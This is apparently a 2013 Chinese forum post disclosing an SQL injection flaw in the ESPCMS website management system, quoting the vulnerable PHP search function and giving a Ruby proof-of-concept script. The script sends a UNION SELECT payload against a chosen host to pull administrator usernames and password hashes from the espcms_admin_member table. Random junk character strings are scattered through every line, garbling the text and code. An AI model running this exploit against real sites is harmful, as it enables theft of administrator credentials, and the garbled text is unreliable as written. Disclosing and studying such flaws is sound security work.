0×0 漏洞概述0×1 漏洞细节) L# s9 I. k: P: }
0×2 PoC
3 F6 X Z: \6 ^# F
' @4 N' }" a/ Y# F& m8 c& y3 n; M/ X. Q1 J6 K5 `: z& k8 G
+ B: }/ u$ K& x' u, y0 l- y& C1 g0×0 漏洞概述- L Q$ t3 D( Z' Z
4 s+ }# R! F' o0 Q
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。& r7 H$ |. z# }3 s ?
其在处理传入的参数时考虑不严谨导致SQL注入发生8 g/ s A5 N' E* V U
# c; L, n5 }5 l( Y
. j7 _, p9 H) Q5 ?( A S$ \4 w0×1 漏洞细节0 [% M. G# n/ G, e! d
4 f6 n9 a9 }* H' X变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。! }7 f2 ^0 `% b8 ^% [
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。5 N f- I6 E9 c0 [% [
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。4 t& ?8 J) }: G! T; J
, [9 b) w8 f, v/ [8 D4 Q
在/interface/3gwap_search.php文件的in_result函数中:8 T+ Y) `; I8 H
! r) \5 V* I+ q+ ~8 O! N9 d: t1 Z4 i/ u# s
7 i1 n' K U. F* f& i( V
function in_result() { X8 w" L5 Y x. _: m" \) V, Z
... ... ... ... ... ... ... ... ...' `- M; x3 m: @8 I# l
$urlcode = $_SERVER[ 'QUERY_STRING '];% s7 y# b! o+ C4 F3 d( d
parse_str(html_entity_decode($urlcode), $output);
4 A/ f/ q: b4 |2 G n+ b& s, p
... ... ... ... ... ... ... ... ...
1 G3 c9 C1 G1 M& U, | if (is_array($output['attr' ]) && count($output['attr']) > 0) {9 e: j& B' B' L* E* }- v
5 N; d# d, v( n$ h/ ]; E7 u# }
$db_table = db_prefix . 'model_att';2 \; T, O, }0 p! A/ ~. `! i
/ t8 y' h# C! J3 K foreach ($output['attr' ] as $key => $value) {
* G/ o: u r1 L* S, J' N; F J% ]/ A if ($value) {
8 P$ J' v, w W7 P- @: x
. {' s" W5 L& r/ F8 T5 K* C $key = addslashes($key);7 {+ b8 D! P8 N) B8 e9 d
$key = $this-> fun->inputcodetrim($key);
( q' O8 |, ?( M; d8 B $db_att_where = " WHERE isclass=1 AND attrname='$key'";8 o% E; P7 G" i! l' o2 W. Y, k$ l
$countnum = $this->db_numrows($db_table, $db_att_where);
, h# G N* _- J4 b$ [" v6 P if ($countnum > 0) {+ c K; W$ o! m) K3 }" Z
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
5 P, n, t/ x& V1 V }# w" C, L: X" p9 {9 S
}
* V/ j5 T' [! Z6 W0 n. l C- K }
T- f, ~" g6 ` Z$ O }7 ~9 c* `0 r4 B) w
if (!empty ($keyword) && empty($keyname)) {
2 U2 W4 L% h3 ^8 ^( S $keyname = 'title';, p; q$ w; M; F; B1 Q) d# h
$db_where.= " AND a.title like '%$keyword%'" ;
; \1 ^2 Z- Q, k7 c3 ?8 ?7 B } elseif (!empty ($keyword) && !empty($keyname)) {
9 T' g; Q$ l$ c3 ` $db_where.= " AND $keyname like '% $keyword%'";+ z5 Q7 C4 E' _' @
}
- y, P% [% M* k# b $pagemax = 15;1 K- p% e1 N3 r" J6 s# y
* @& {" s# N. [ $pagesylte = 1;5 R: T0 e4 Y( j( F* B
) M0 R: ^, t9 _7 ]$ s
if ($countnum > 0) {9 ?% ~, A3 V* S6 f6 o
! E, o2 w; k: J" I- b9 F, e0 U
$numpage = ceil($countnum / $pagemax);' x( c+ E; C3 g& K4 x
} else {
' K- c B# @+ B! }7 K- \ $numpage = 1;
0 v& B! p: B6 c/ P W4 ?2 s: W } t3 {6 D1 [& l& ?, F4 b' r
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;9 A3 M+ ^6 q; x2 O/ h
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);, g! Y# x: u7 i% M+ Q& _
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);( ~8 g/ N9 i' n5 V4 ^0 T& e
... ... ... ... ... ... ... ... ...( \+ ]7 v$ y8 ?2 A$ r, M0 ]
}
5 S. n6 U7 ^6 V
5 i+ R7 \8 Q, Z: c7 I3 _$ w, P# w# j: u
0×2 PoC b# G0 A% D: P, o0 @
7 H- `7 N& C/ f$ A- d
7 j8 X B: f* |7 x% i# Q8 O4 `
6 A6 B d, R0 G x' Q; J# ~require "net/http"
, G# J+ o" ]& c1 |. F9 u* ]9 }2 t- l0 m0 F: n
def request(method, url)
* \ N! \0 A+ g( B if method.eql?("get")
3 s; X! O/ E- s5 H. f3 x- _ uri = URI.parse(url)4 A( Z7 ^! K/ K& f
http = Net::HTTP.new(uri.host, uri.port)
! u a; x8 v& b9 j [/ q response = http.request(Net::HTTP::Get.new(uri.request_uri))& E; W) V0 a9 e5 I2 H; G, t" l- f
return response
& i, z) F! |+ |7 H5 k( h' ~0 }0 q end
& }) Y* u; j# b& }( K4 S$ v' Cend! x5 w, }$ r( H8 Z5 }# K
# i0 d% {3 n' O+ v7 Ndoc =<<HERE- |& f1 H, W6 b/ a9 ?9 f8 Q
-------------------------------------------------------
( k6 G7 x, k" C5 YEspcms Injection Exploit" j3 }2 Y& R8 U/ J0 |) J5 {2 v: t
Author:ztz$ z% L+ ^5 j& |* p' W; w
Blog:http://ztz.fuzzexp.org/( h* Y. ? v) {
-------------------------------------------------------& r/ q/ M: [% ~( H5 |5 m
7 P5 J7 m! ]9 i$ Y2 H& J* N4 V0 ?& ZHERE8 v& `# n8 z$ t p0 O! K
6 g. L& D5 k5 C$ {" l# {: M
usage =<<HERE
/ v, r# |* ^6 n) z; YUsage: ruby #{$0} host port path; B2 H. y2 ~) A
example: ruby #{$0} www.target.com 80 /
+ Z) N) Z1 s# O- |2 x. n xHERE5 d- ^3 v! C/ F% ? A
) M D4 h" m3 q% j& Z6 Jputs doc
# O* @! [0 ^2 C: y" k2 oif ARGV.length < 3+ B" L2 v9 |8 O
puts usage* O3 E, f+ H* w: {
else
/ D) ^" q/ e& h4 X $host = ARGV[0]
$ h1 Q8 L" P& O2 p) s $port = ARGV[1]
, O! k0 O! F3 J1 U4 E6 Y $path = ARGV[2]7 ]: ^6 s f; Z+ j
- W8 N/ N( ~& s" y8 ~: s% v9 {" s
puts "send request..."
' L" R, W |! ~8 G& e& v5 p2 b url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
# Q$ i; z7 z, cattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13" ^8 L, D- f8 V& o
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
1 k' n+ L* }4 K3 Y. B: f,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
2 g) C8 v( a; q response = request("get", url); t) ?" H2 ~* m6 @3 k3 r" h
result = response.body.scan(/\w+&\w{32}/)
: t. P" _2 r! o0 \4 c puts result$ i' E9 \3 @1 J# I% A8 P
end U' D ]. M" c
; {) s7 Y, s3 V4 N' J |
发表于 2013-7-27 18:31:52
收藏
支持
反对